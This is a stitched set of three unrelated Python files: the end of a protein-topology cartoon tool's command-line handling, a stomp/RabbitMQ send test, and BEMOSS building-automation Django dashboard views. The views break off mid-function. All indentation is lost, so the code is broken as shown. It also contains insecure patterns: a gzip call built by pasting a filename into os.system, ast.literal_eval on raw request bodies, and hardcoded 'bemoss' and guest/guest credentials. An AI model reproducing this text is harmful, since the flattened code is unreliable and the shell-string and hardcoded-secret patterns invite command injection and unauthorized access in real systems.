color_scheme = 'none'
enable_sheet_gap_rule = False
use_helix_clustering = False
helix_cluster_shading_color = None
connector_color_scheme = 'all'
helix_proximity_shading_colors = None
multidomain_cartoon = False
interdomain_connectors = False
use_scaling = False
label_residue_numbers = False
for opt,arg in opts:
if opt == "-3": # include 3_10 helices
include_310_helices = True
elif opt == "-5": # include pi helices
include_pi_helices = True
elif opt == "-a": # for Dunnart, use auto graph layout
use_dunnart_auto = True
elif opt == "-c": # use HELIX and SHEET cards in PDB file
use_pdb_secstruct = True
elif opt == "-d": # use dot
use_dot = True
elif opt == "-f": # shade each sheet a different color
for valid_sheet_shading_color_re in valid_sheet_shading_colors_re:
if valid_sheet_shading_color_re.match(arg):
sheet_shading_colors = arg
break
if sheet_shading_colors == None:
sys.stderr.write("valid values for -f are: " +
str(valid_sheet_shading_colors) +'\n')
usage(sys.argv[0])
# verify that color names are known if specified
if sheet_shading_colors != 'auto':
try:
get_color_list(sheet_shading_colors)
except KeyError:
sys.stderr.write("Unknown color name in -f option\n")
usage(sys.argv[0])
elif opt == "-g": # set strand and minimum separation value
set_strand_gap(int(arg))
elif opt == "-h": # use hbonds not bridge partners
use_hbonds = True
elif opt == "-l": # connector color scheme
connector_color_scheme = None
for valid_conncolorscheme_re in valid_connector_color_options_re:
if valid_conncolorscheme_re.match(arg):
connector_color_scheme = arg
break
if connector_color_scheme == None:
sys.stderr.write("valid values for -l are; " +
str(valid_connector_color_options) + "\n")
usage(sys.argv[0])
# verify that color names are known if specified
if ':' in connector_color_scheme:
try:
get_connector_colors(connector_color_scheme)
except KeyError:
sys.stderr.write("Unknown color name in -l option\n")
usage(sys.argv[0])
elif opt == "-m": # write MATLAB m-files
write_mfiles = True
elif opt == "-n": # use neato
use_neato = True
elif opt == "-o": # color scheme
color_scheme = None
for valid_coloropt_re in valid_color_options_re:
if valid_coloropt_re.match(arg):
color_scheme = arg
break
if color_scheme == None:
sys.stderr.write("valid values for -o are: " +
str(valid_color_options) + "\n")
usage(sys.argv[0])
            # verify that color names are known if specified
if color_scheme[:6] == "simple":
try:
get_simple_colors(color_scheme)
except KeyError:
sys.stderr.write("Unknown color name in -o simple option\n")
usage(sys.argv[0])
except ValueError:
sys.stderr.write("Duplicate type name in -o simple option\n")
usage(sys.argv[0])
elif opt == "-p": # domain parsing program
domain_program = None
for valid_domarg_re in valid_domain_programs_re:
if valid_domarg_re.match(arg):
domain_program = arg
break
if domain_program == None:
sys.stderr.write("valid values for -p are: " +
str(valid_domain_programs) + "\n")
usage(sys.argv[0])
elif opt == "-r": # disable TableauCreator, use internal methods
use_tableaucreator = False
elif opt == "-b":
if arg not in valid_sse_label_options:
sys.stderr.write("valid options for -b are " +
str(valid_sse_label_options))
usage(sys.argv[0])
sse_label_scheme = arg
elif opt == "-s": # write PyMOL .pml file
write_pmlfile = True
elif opt == "-t":
if arg not in valid_secstruct_programs:
sys.stderr.write("valid values for -t are: " +
str(valid_secstruct_programs) + "\n")
usage(sys.argv[0])
secstruct_program = arg
elif opt == "-i": # use distnace matrix instead of heuristic (old)
# helix placement algorithm
heuristic_helix_placement = False
elif opt == "-j": # for heuristic helix placement, not between sheets
enable_sheet_gap_rule = True
elif opt == "-k": # for heuristic helix placement, cluster helices
use_helix_clustering = True
if not valid_k_option_re.match(arg):
sys.stderr.write("valid options for -k are: " +
valid_k_option + '\n')
usage(sys.argv[0])
# verify that color name is known if not #RGB
try:
get_color_list(arg)
except KeyError:
sys.stderr.write("Unknown color name in -k option\n")
usage(sys.argv[0])
helix_cluster_shading_color = arg
elif opt == "-e": # color nearby helix clusters with same cluster shade
for valid_helixcluster_shading_color_re in \
valid_helixcluster_shading_colors_re:
if valid_helixcluster_shading_color_re.match(arg):
helix_proximity_shading_colors = arg
break
if helix_proximity_shading_colors == None:
sys.stderr.write("valid values for -e are: " +
str(valid_helixcluster_shading_colors) +'\n')
usage(sys.argv[0])
# verify that color names are known if specified
if helix_proximity_shading_colors != 'auto':
try:
get_color_list(helix_proximity_shading_colors)
except KeyError:
sys.stderr.write("Unknown color name in -e option\n")
usage(sys.argv[0])
elif opt == "-u": # place all domains in one cartoon SVG file
multidomain_cartoon = True
elif opt == "-w": # connectors between domains on multidomain cartoon
interdomain_connectors = True
elif opt == "-v": # verbose
verbose = True # this module only
ptnode_set_verbose(True) # ptnode module
ptsecstruct.ptsecstruct_set_verbose(True) # ptsecstruct module
ptdomain_set_verbose(True)
ptrelpos_set_verbose(True)
pttableau.pttableau_set_verbose(True)
elif opt == "-q": # label residue numbers on tail and head of shapes
label_residue_numbers = True
elif opt == "-x":
use_connector_arrowheads = True
elif opt == "-y":
use_scaling = True
elif opt == "-z": # print version to stdout and exit
sys.stdout.write(get_version())
sys.stdout.write('\n')
sys.exit(0)
else:
usage(sys.argv[0])
if use_dot and use_neato:
sys.stderr.write(
'-d (dot) and -n (neato) options are mutually exclusive\n')
usage(sys.argv[0])
if use_hbonds and not (use_dot or use_neato):
sys.stderr.write('-h (hbonds) option requires -d (dot) or -n (neato)\n')
usage(sys.argv[0])
if use_dunnart_auto and (use_dot or use_neato):
sys.stderr.write('-a (Dunnart auto graph layout) cannot be used with ' +
'GraphViz (-d or -n)\n')
usage(sys.argv[0])
if sse_label_scheme == 'sequential' and (use_dot or use_neato):
sys.stderr.write('sequential node numbering cannot be used with ' +
'GraphViz (-d or -n)\n')
usage(sys.argv[0])
if use_connector_arrowheads and (use_dot or use_neato):
sys.stderr.write('-x (connector arrowheads) cannot be used with ' +
'GraphViz (-d or -n)\n')
usage(sys.argv[0])
if enable_sheet_gap_rule and not heuristic_helix_placement:
sys.stderr.write("-j cannot be used with distance matrix placement (-i)\n")
usage(sys.argv[0])
if use_helix_clustering and not heuristic_helix_placement:
sys.stderr.write("-k cannot be used with distance matrix placement (-i)\n")
usage(sys.argv[0])
if helix_proximity_shading_colors and not use_helix_clustering:
sys.stderr.write("-e can only be used with helix clustering (-k)\n")
usage(sys.argv[0])
if interdomain_connectors and not multidomain_cartoon:
sys.stderr.write("-w can only be used with multidomain cartoons (-u)\n")
usage(sys.argv[0])
if (connector_color_scheme[:6] == 'domain' and not interdomain_connectors):
sys.stderr.write("WARNING: 'domain' connector color scheme only makes"
" sense with interdomain connectors (-w)\n")
sys.stderr.write(" Connector color scheme reset to 'none'.\n")
if len(args) != 1:
usage(sys.argv[0])
pdb_filename = args[0]
# check for compressed files. We only support gzip (.gz)
# Note we are not using the zlib or GzipFile python modules
# since we are calling to external programs which require the
    # file uncompressed themselves anyway so we'll just run gzip
# to uncompress the file to a temporary directory.
pdb_file_basename = os.path.basename(pdb_filename)
(name,extension) = os.path.splitext(pdb_file_basename)
if extension == '.gz':
TMPDIR = os.tempnam(None, "ptgz")
os.mkdir(TMPDIR)
tmp_pdbfilename = os.path.join(TMPDIR, name)
os.system("gzip " + pdb_filename + " -d -c > " + tmp_pdbfilename)
our_pdb_filename = tmp_pdbfilename
used_tmp_file = True
else:
our_pdb_filename = pdb_filename
used_tmp_file = False
try:
# make graph(s) from PDB file
make_graphs(our_pdb_filename, domain_program, secstruct_program,
use_dot, use_neato, use_hbonds, use_dunnart_auto,
sse_label_scheme, use_connector_arrowheads,
connector_color_scheme,
heuristic_helix_placement, use_tableaucreator,
include_310_helices, include_pi_helices,
write_mfiles, use_pdb_secstruct, sheet_shading_colors,
color_scheme, enable_sheet_gap_rule,
use_helix_clustering,
helix_cluster_shading_color,
helix_proximity_shading_colors,
multidomain_cartoon, interdomain_connectors,
use_scaling, write_pmlfile, pdb_filename,
label_residue_numbers)
finally:
if used_tmp_file:
cleanup_tmpdir(TMPDIR)
if __name__ == "__main__":
# tmpdir() annoyingly gives 'security' warning on stderr, as does
# tmpnam(), unless we add these filterwarnings() calls.
warnings.filterwarnings('ignore', 'tempdir', RuntimeWarning)
warnings.filterwarnings('ignore', 'tempnam', RuntimeWarning)
main()
|
import unittest
import stomp
from stomp.test.testutils import *
class TestRabbitMQSend(unittest.TestCase):
def setUp(self):
pass
def testbasic(self):
conn = stomp.Connection(get_rabbitmq_host(), 'guest', 'guest')
listener = TestListener('123')
conn.set_listener('', listener)
conn.start()
conn.connect(wait=True)
conn.subscribe(destination='/queue/test', id=1, ack='auto')
conn.send(body='this is a test', destination='/queue/test', receipt='123')
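        # the receipt id matches the one given to TestListener above, so
        # wait_on_receipt() below can block until the broker acknowledges the send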
listener.wait_on_receipt()
conn.disconnect(receipt=None)
self.assert_(listener.connections == 1, 'should have received 1 connection acknowledgement')
self.assert_(listener.messages == 1, 'should have received 1 message')
self.assert_(listener.errors == 0, 'should not have received any errors')
|
# -*- coding: utf-8 -*-
'''
Copyright (c) 2016, Virginia Tech
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The views and conclusions contained in the software and documentation are those of the authors and should not be
interpreted as representing official policies, either expressed or implied, of the FreeBSD Project.
This material was prepared as an account of work sponsored by an agency of the United States Government. Neither the
United States Government nor the United States Department of Energy, nor Virginia Tech, nor any of their employees,
nor any jurisdiction or organization that has cooperated in the development of these materials, makes any warranty,
express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness or
any information, apparatus, product, software, or process disclosed, or represents that its use would not infringe
privately owned rights.
Reference herein to any specific commercial product, process, or service by trade name, trademark, manufacturer, or
otherwise does not necessarily constitute or imply its endorsement, recommendation, favoring by the United States
Government or any agency thereof, or Virginia Tech - Advanced Research Institute. The views and opinions of authors
expressed herein do not necessarily state or reflect those of the United States Government or any agency thereof.
VIRGINIA TECH – ADVANCED RESEARCH INSTITUTE
under Contract DE-EE0006352
#__author__ = "BEMOSS Team"
#__credits__ = ""
#__version__ = "2.0"
#__maintainer__ = "BEMOSS Team"
#__email__ = "aribemoss@gmail.com"
#__website__ = "www.bemoss.org"
#__created__ = "2014-09-12 12:04:50"
#__lastUpdated__ = "2016-03-14 11:23:33"
'''
from django.http import HttpResponse, HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from django.template import RequestContext
from django.shortcuts import render_to_response
import json
import ast
import re
import time
import os
from _utils.page_load_utils import get_device_list_side_navigation, get_device_list_dashboard
from apps.alerts.views import get_notifications, general_notifications
from agents.ZMQHelper.zmq_pub import ZMQ_PUB
from _utils import config_helper
from .models import DeviceMetadata, Building_Zone, GlobalSetting
from apps.thermostat.models import Thermostat
from apps.smartplug.models import Plugload
from apps.lighting.models import Lighting
from apps.VAV.models import VAV
from apps.RTU.models import RTU
from apps.admin.models import NetworkStatus
import _utils.defaults as __
kwargs = {'subscribe_address': __.SUB_SOCKET,
'publish_address': __.PUSH_SOCKET}
zmq_pub = ZMQ_PUB(**kwargs)
APPROVED = 'APR'
NON_BEMOSS_DEVICE = 'NBD'
PENDING = 'PND'
APPROVAL_STATUS_CHOICES = (
(APPROVED, 'Approved'),
(PENDING, 'Pending'),
(NON_BEMOSS_DEVICE, 'Non-BEMOSS Device'),
)
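# The views below accept the human-readable label from the UI (e.g. 'Approved')
# and map it back to its short code (e.g. 'APR') by iterating over these pairs.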
@login_required(login_url='/login/')
def add_new_zone(request):
if request.POST:
_data = request.raw_post_data
zone_id = ""
a = re.compile("^[A-Za-z0-9_]{6,15}$")
if a.match(_data):
# get_or_create returns an (instance, created) tuple; use the instance
# directly instead of re-querying for the zone that was just created.
zone, _created = Building_Zone.objects.get_or_create(zone_nickname=str(_data))
zone_id = zone.zone_id
global_settings = GlobalSetting(id=zone_id, heat_setpoint=70, cool_setpoint=72, illuminance=67, zone_id=zone_id)
global_settings.save()
message = "success"
if request.is_ajax():
return HttpResponse(str(zone_id), mimetype='text/plain')
else:
message = "invalid"
if request.is_ajax():
return HttpResponse("invalid", mimetype='text/plain')
@login_required(login_url='/login/')
def save_changes_modal(request):
if request.POST:
_data = request.raw_post_data
a = re.compile("^[A-Za-z0-9_]{6,15}$")
_data = ast.literal_eval(_data)
if a.match(_data['nickname']):
device_id = _data['id']
nickname = _data['nickname']
device_type_id = _data['device_type']
if device_type_id == '1TH' :
device = Thermostat.objects.get(thermostat_id=device_id)
device.nickname = nickname
device.save()
elif device_type_id == '1VAV':
device = VAV.objects.get(vav_id=device_id)
device.nickname = nickname
device.save()
elif device_type_id == '1RTU':
device = RTU.objects.get(rtu_id=device_id)
device.nickname = nickname
device.save()
elif device_type_id =='2HUE' or device_type_id =='2WL' or device_type_id == '2WSL':
device = Lighting.objects.get(lighting_id=device_id)
device.nickname = nickname
device.save()
elif device_type_id == '3WSP' or device_type_id == '3WP' or device_type_id == '3WIS':
device = Plugload.objects.get(plugload_id=device_id)
device.nickname = nickname
device.save()
message = {'status':'success',
'device_id':device_id,
'nickname':nickname}
if request.is_ajax():
return HttpResponse(json.dumps(message), mimetype='application/json')
else:
message = "invalid"
if request.is_ajax():
return HttpResponse(json.dumps(message), mimetype='application/json')
@login_required(login_url='/login/')
def save_zone_nickname_changes(request):
context = RequestContext(request)
if request.POST:
_data = request.raw_post_data
a = re.compile("^[A-Za-z0-9_]{6,15}$")
_data = ast.literal_eval(_data)
if a.match(_data['nickname']):
zone_id = _data['id']
nickname = _data['nickname']
zone = Building_Zone.objects.get(zone_id=zone_id)
zone.zone_nickname = nickname # change field
zone.save()
message = {'status':'success',
'zone_id':zone_id,
'nickname':nickname}
if request.is_ajax():
return HttpResponse(json.dumps(message),mimetype='application/json')
else:
message = "invalid"
if request.is_ajax():
return HttpResponse(json.dumps(message),mimetype='application/json')
@login_required(login_url='/login/')
def identify_device(request):
if request.POST:
_data = request.raw_post_data
_data = json.loads(_data)
device_info = [ob.data_as_json() for ob in DeviceMetadata.objects.filter(device_id=_data['id'])]
device_id = device_info[0]['device_id']
device_model = device_info[0]['device_model_id']
device_type_id = device_model.device_model_id
device_type = ''
# Initialise the zone before the optional override so a zone_id supplied in
# the request payload is not immediately clobbered; the per-type lookups
# below refresh it from the database for known device types.
device_zone = ''
if 'zone_id' in _data:
device_zone = _data['zone_id']
if device_type_id == '1TH' or device_type_id == '1NST' or device_type_id == '1HWT':
device_zone = Thermostat.objects.get(thermostat_id=device_id).zone_id
device_type = 'thermostat'
elif device_type_id == '1RTU':
device_zone = RTU.objects.get(rtu_id=device_id).zone_id
device_type = 'rtu'
elif device_type_id == '1VAV':
device_zone = VAV.objects.get(vav_id=device_id).zone_id
device_type = 'vav'
elif device_type_id =='2HUE' or device_type_id =='2WL' or device_type_id == '2WSL':
device_zone = Lighting.objects.get(lighting_id=device_id).zone_id
device_type = 'lighting'
elif device_type_id == '3WSP' or device_type_id == '3WP' or device_type_id == '3WIS':
device_zone = Plugload.objects.get(plugload_id=device_id).zone_id
device_type = 'plugload'
info_required = "Identify device"
ieb_topic = '/ui/agent/' + device_type + '/identify' + '/bemoss/' + str(device_zone) + '/' + device_id
zmq_pub.requestAgent(ieb_topic, info_required, "text/plain", "UI")
if request.is_ajax():
return HttpResponse(json.dumps("success"), mimetype='application/json')
@login_required(login_url='/login/')
def identify_status(request):
if request.POST:
_data = request.raw_post_data
device_info = [ob.data_as_json() for ob in DeviceMetadata.objects.filter(device_id=_data)]
device_type_id = device_info[0]['device_model_id']
device_type_id = device_type_id.device_model_id
if device_type_id == '1TH' or device_type_id == '1NST' or device_type_id == '1HWT':
device_type = 'thermostat'
elif device_type_id == '1RTU':
device_type = 'rtu'
elif device_type_id == '1VAV':
device_type = 'vav'
elif device_type_id =='2HUE' or device_type_id =='2WL' or device_type_id == '2WSL':
device_type = 'lighting'
elif device_type_id == '3WSP' or device_type_id == '3WP' or device_type_id == '3WIS':
device_type = 'plugload'
json_result = {'status': 'success'}
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
def recursive_get_device_update(update_variable):
wifi_3m50_device_initial_update = config_helper.get_device_update_message(update_variable)
vals = ""
if wifi_3m50_device_initial_update != '{update_number}/{status}':
vals = wifi_3m50_device_initial_update
return vals
else:
# Wait and poll again, returning the recursive result so the eventual
# update message propagates back to the original caller.
time.sleep(5)
return recursive_get_device_update(update_variable)
@login_required(login_url='/login/')
def discover_all(request):
if request.POST:
#_data = request.body
discover_all_topic = '/ui/discoveryagent/discover/all'
zmq_pub.requestAgent(discover_all_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
json_result = {'status': 'success'}
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def discover_hvac(request):
if request.POST:
#_data = request.body
discover_hvac_topic = '/ui/discoveryagent/discover/hvac/all'
zmq_pub.requestAgent(discover_hvac_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
json_result = {'status': 'success'}
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def discover_lighting(request):
if request.POST:
#_data = request.body
discover_lighting_topic = '/ui/discoveryagent/discover/lighting/all'
zmq_pub.requestAgent(discover_lighting_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
json_result = {'status': 'success'}
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def discover_plugload(request):
if request.POST:
#_data = request.body
discover_plugload_topic = '/ui/discoveryagent/discover/plugload/all'
zmq_pub.requestAgent(discover_plugload_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
json_result = {'status': 'success'}
if request.is_ajax():
return HttpResponse(json.dumps(json_result), mimetype='application/json')
@login_required(login_url='/login/')
def discover_nodes(request):
context = RequestContext(request)
if request.user.get_profile().group.name.lower() == 'admin':
device_list_side_nav = get_device_list_side_navigation()
bemoss_lite = [ob.data_dashboard() for ob in NetworkStatus.objects.filter(node_status='ONLINE')]
active_al = get_notifications()
context.update({'active_al':active_al})
bemoss_not = general_notifications()
context.update({'b_al': bemoss_not})
context.update(device_list_side_nav)
return render_to_response(
'dashboard/node_discovery.html',
{'lites': bemoss_lite}, context)
else:
return HttpResponseRedirect('/home/')
#Version 2.2
#Change: Includes the new field 'approval_status' for manual approval process
@login_required(login_url='/login/')
def discover(request):
print "Discovering devices"
context = RequestContext(request)
username = request.user
device_list_side_nav = get_device_list_side_navigation()
print device_list_side_nav
# Check Philips Hue Username Exists or not:
# Set default value as no:
hue_username_exists = 'no'
DIR = os.path.dirname(__file__)
DIR = DIR.replace('/bemoss_web_ui/apps/dashboard', '/bemoss_os/')
LAUNCHFILES_DIR = os.path.join(DIR, 'Agents/LaunchFiles/')
for idx in os.listdir(LAUNCHFILES_DIR):
if '2HUE' in idx and '.json~' not in idx:
_launch_file = os.path.join(LAUNCHFILES_DIR, idx)
f = open(_launch_file, 'r')
data = json.load(f)
if 'username' in data.keys():
hue_username_exists = 'yes'
if request.user.get_profile().group.name.lower() == 'admin':
# Get data for display on discovery dashboard
data_dashboard = get_device_list_dashboard()
#Update side navigation context
context.update(device_list_side_nav)
#Get alerts and notifications list
active_al = get_notifications()
context.update({'active_al':active_al})
bemoss_not = general_notifications()
context.update({'b_al': bemoss_not})
context.update({'username_exists': hue_username_exists})
return render_to_response(
'dashboard/discovery.html', data_dashboard, context)
else:
return HttpResponseRedirect('/home/')
@login_required(login_url='/login/')
def change_zones_thermostats(request):
#print "Inside change zones for hvac controllers"
if request.POST:
_data = request.body
_data = json.loads(_data)
for thermostat in _data['thermostats']:
if thermostat[1] != "Assign a New Zone":
zone = Building_Zone.objects.get(zone_nickname__iexact=thermostat[1])
th_instance = Thermostat.objects.get(thermostat_id=thermostat[0])
updated_approval_status = thermostat[3]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
zone_update_send_topic = '/ui/networkagent/' + str(thermostat[0]) + '/' + str(th_instance.zone_id) + '/' + str(zone.zone_id) + '/change'+'/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
old_zone_id = th_instance.zone_id
th_instance.zone = zone # change field
th_instance.nickname = thermostat[2]
# Update device approval status
d_info = DeviceMetadata.objects.get(device_id=thermostat[0])
current_approval_status = d_info.approval_status
print current_approval_status
if updated_approval_status != current_approval_status:
d_info.approval_status = updated_approval_status
d_info.save()
th_instance.save()
for vav in _data['vav']:
if vav[1] != "Assign a New Zone":
zone = Building_Zone.objects.get(zone_nickname__iexact=vav[1])
vav_instance = VAV.objects.get(vav_id=vav[0])
updated_approval_status = vav[3]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
# if zone.zone_id != vav_instance.zone_id:
zone_update_send_topic = '/ui/networkagent/' + str(vav[0]) + '/' + str(vav_instance.zone_id) + '/' + str(zone.zone_id) + '/change'+'/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
old_zone_id = vav_instance.zone_id
vav_instance.zone = zone # change field
vav_instance.nickname = vav[2]
d_info = DeviceMetadata.objects.get(device_id=vav[0])
current_approval_status = d_info.approval_status
print current_approval_status
if updated_approval_status != current_approval_status:
d_info.approval_status = updated_approval_status
d_info.save()
vav_instance.save()
for rtu in _data['rtu']:
if rtu[1] != "Assign a New Zone":
zone = Building_Zone.objects.get(zone_nickname__iexact=rtu[1])
rtu_instance = RTU.objects.get(rtu_id=rtu[0])
updated_approval_status = rtu[3]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
#if zone.zone_id != rtu_instance.zone_id:
zone_update_send_topic = '/ui/networkagent/' + str(rtu[0]) + '/' + str(rtu_instance.zone_id) + '/' + str(zone.zone_id) + '/change'+'/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
old_zone_id = rtu_instance.zone_id
rtu_instance.zone = zone # change field
rtu_instance.nickname = rtu[2]
d_info = DeviceMetadata.objects.get(device_id=rtu[0])
current_approval_status = d_info.approval_status
print current_approval_status
if updated_approval_status != current_approval_status:
d_info.approval_status = updated_approval_status
d_info.save()
rtu_instance.save()
if request.is_ajax():
return HttpResponse(json.dumps("success"), mimetype='application/json')
@login_required(login_url='/login/')
def change_zones_plugloads(request):
#print "Inside change zones for plugloads"
if request.POST:
_data = request.body
_data = json.loads(_data)
for plugload in _data['data']:
if plugload[1] != "Assign a New Zone":
zone = Building_Zone.objects.get(zone_nickname__iexact=plugload[1])
pl_instance = Plugload.objects.get(plugload_id=plugload[0])
updated_approval_status = plugload[3]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
#if zone.zone_id != pl_instance.zone_id:
zone_update_send_topic = '/ui/networkagent/' + str(plugload[0]) + '/' + str(pl_instance.zone_id) + '/' + str(zone.zone_id) + '/change'+'/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
old_zone_id = pl_instance.zone_id
pl_instance.zone = zone # change field
pl_instance.nickname = plugload[2]
d_info = DeviceMetadata.objects.get(device_id=plugload[0])
current_approval_status = d_info.approval_status
print current_approval_status
if updated_approval_status != current_approval_status:
d_info.approval_status = updated_approval_status
d_info.save()
pl_instance.save()
if request.is_ajax():
return HttpResponse(json.dumps("success"), mimetype='application/json')
@login_required(login_url='/login/')
def change_zones_lighting_loads(request):
#print "Inside change zones for lighting loads"
if request.POST:
_data = request.body
_data = json.loads(_data)
#print _data
for lt_load in _data['data']:
if lt_load[1] != "Assign a New Zone":
zone = Building_Zone.objects.get(zone_nickname__iexact=lt_load[1])
lt_instance = Lighting.objects.get(lighting_id=lt_load[0])
updated_approval_status = lt_load[3]
for status_key, status_val in APPROVAL_STATUS_CHOICES:
if updated_approval_status == status_val:
updated_approval_status = status_key
break
# if zone.zone_id != lt_instance.zone_id:
zone_update_send_topic = '/ui/networkagent/' + str(lt_load[0]) + '/' + str(lt_instance.zone_id) + '/' + str(zone.zone_id) + '/change'+'/'+updated_approval_status
zmq_pub.requestAgent(zone_update_send_topic, '{"auth_token": "bemoss"}', "text/plain", "UI")
old_zone_id = lt_instance.zone_id
lt_instance.zone = zone # change field
lt_instance.nickname = lt_load[2]
d_info = DeviceMetadata.objects.get(device_id=lt_load[0])
current_approval_status = d_info.approval_status
print current_approval_status
if updated_approval_status != current_approval_status:
d_info.approval_status = updated_approval_status
d_info.save()
lt_instance.save()
if request.is_ajax():
return HttpResponse(json.dumps("success"), mimetype='application/json')
@login_required(login_url='/login/')
def change_zones_lite(request):
#print "Inside change zones for bemoss lite"
if request.POST:
_data = request.body
_data = json.loads(_data)
for lite in _data['data']:
if lite[1] != "Associate with Zone":
zone = Building_Zone.objects.get(zone_nickname__iexact=lite[1])
lite_instance = NetworkStatus.objects.get(node_id=lite[0])
lite_instance.associated_zone = zone # change field
lite_instance.save()
if request.is_ajax():
return HttpResponse(json.dumps("success"), mimetype='application/json')
@login_required(login_url='/login/')
def bemoss_home(request):
context = RequestContext(request)
username = request.user
device_list_side_nav = get_device_list_side_navigation()
device_count ={
"devices": {
}
}
all_zones = Building_Zone.objects.all()
for zone in all_zones:
th_count = Thermostat.objects.filter(network_status='ONLINE', zone_id=zone.zone_id,
thermostat_id__approval_status='APR').count()
vav_count = VAV.objects.filter(network_status='ONLINE', zone_id=zone.zone_id,
vav_id__approval_status='APR').count()
rtu_count = RTU.objects.filter(network_status='ONLINE', zone_id=zone.zone_id,
rtu_id__approval_status='APR').count()
t_count = th_count + vav_count + rtu_count
pl_count = Plugload.objects.filter(network_status='ONLINE', zone_id=zone.zone_id,
plugload_id__approval_status='APR').count()
lt_count = Lighting.objects.filter(network_status='ONLINE', zone_id=zone.zone_id,
lighting_id__approval_status='APR').count()
device_count['devices'][zone.zone_id] = {'th': 0, 'pl': 0, 'lt': 0, }
device_count['devices'][zone.zone_id]['th'] = t_count
device_count['devices'][zone.zone_id]['pl'] = pl_count
device_count['devices'][zone.zone_id]['lt'] = lt_count
zones_p = [ob.data_dashboard() for ob in Building_Zone.objects.all().order_by('zone_nickname')]
for zone in zones_p:
z_id = zone['id']
zone['t_count'] = device_count['devices'][z_id]['th']
zone['pl_count'] = device_count['devices'][z_id]['pl']
zone['lt_count'] = device_count['devices'][z_id]['lt']
active_al = get_notifications()
context.update({'active_al':active_al})
bemoss_not = general_notifications()
context.update({'b_al': bemoss_not})
context.update(device_list_side_nav)
return render_to_response(
'dashboard/dashboard.html',
{'zones_p': zones_p}, context)
@login_required(login_url='/login/')
def change_global_settings(request):
if request.POST:
_data = request.body
_data = json.loads(_data)
zone_id = _data['zone_id']
zone = Building_Zone.objects.get(zone_id=zone_id)
gsettings = GlobalSetting.objects.get(zone_id=zone)
gsettings.heat_setpoint = _data['heat_setpoint']
gsettings.cool_setpoint = _data['cool_setpoint']
gsettings.illuminance = _data['illumination']
gsettings.save()
if request.is_ajax():
return HttpResponse(json.dumps("success"), mimetype='application/json')
@login_required(login_url='/login/')
def zone_device_listing(request, zone_dev):
context = RequestContext(request)
username = request.user
zone_dev = zone_dev.encode('ascii', 'ignore')
zone_info = zone_dev.split("_")
zone_id = zone_info[0]
device_type = zone_info[1]
#Side navigation bar
device_list_side_nav = get_device_list_side_navigation()
context.update(device_list_side_nav)
#For the page
if device_type == 'th':
thermostats = [ob.data_as_json() for ob in
Thermostat.objects.filter(zone_id=zone_id, thermostat_id__approval_status='APR',
network_status='ONLINE')]
if len(thermostats) != 0:
zone_nickname = thermostats[0]['zone']['zone_nickname']
rtu = [ob.as_json() for ob in RTU.objects.filter(zone_id=zone_id, rtu_id__approval_status='APR',
network_status='ONLINE')]
if len(rtu) != 0:
zone_nickname = rtu[0]['zone']['zone_nickname']
vav = [ob.as_json() for ob in VAV.objects.filter(zone_id=zone_id, vav_id__approval_status='APR',
network_status='ONLINE')]
if len(vav) != 0:
zone_nickname = vav[0]['zone']['zone_nickname']
active_al = get_notifications()
context.update({'active_al':active_al})
bemoss_not = general_notifications()
context.update({'b_al': bemoss_not})
context.update(device_list_side_nav)
return render_to_response(
'dashboard/thermostats.html',
{'thermostats': thermostats, 'rtu': rtu, 'vav': vav, 'zone_id': zone_id, 'zone_nickname': zone_nickname,
}, context)
elif device_type == 'lt':
lighting = [ob.data_as_json() for ob in
Lighting.objects.filter(zone_id=zone_id, lighting_id__approval_status='APR',
network_status='ONLINE')]
zone_nickname = lighting[0]['zone']['zone_nickname']
return render_to_response(
'dashboard/lighting_loads.html',
{'lighting_loads': lighting, 'zone_id': zone_id, 'zone_nickname': zone_nickname}, context)
elif device_type == 'pl':
plugloads = [ob.data_as_json() for ob in
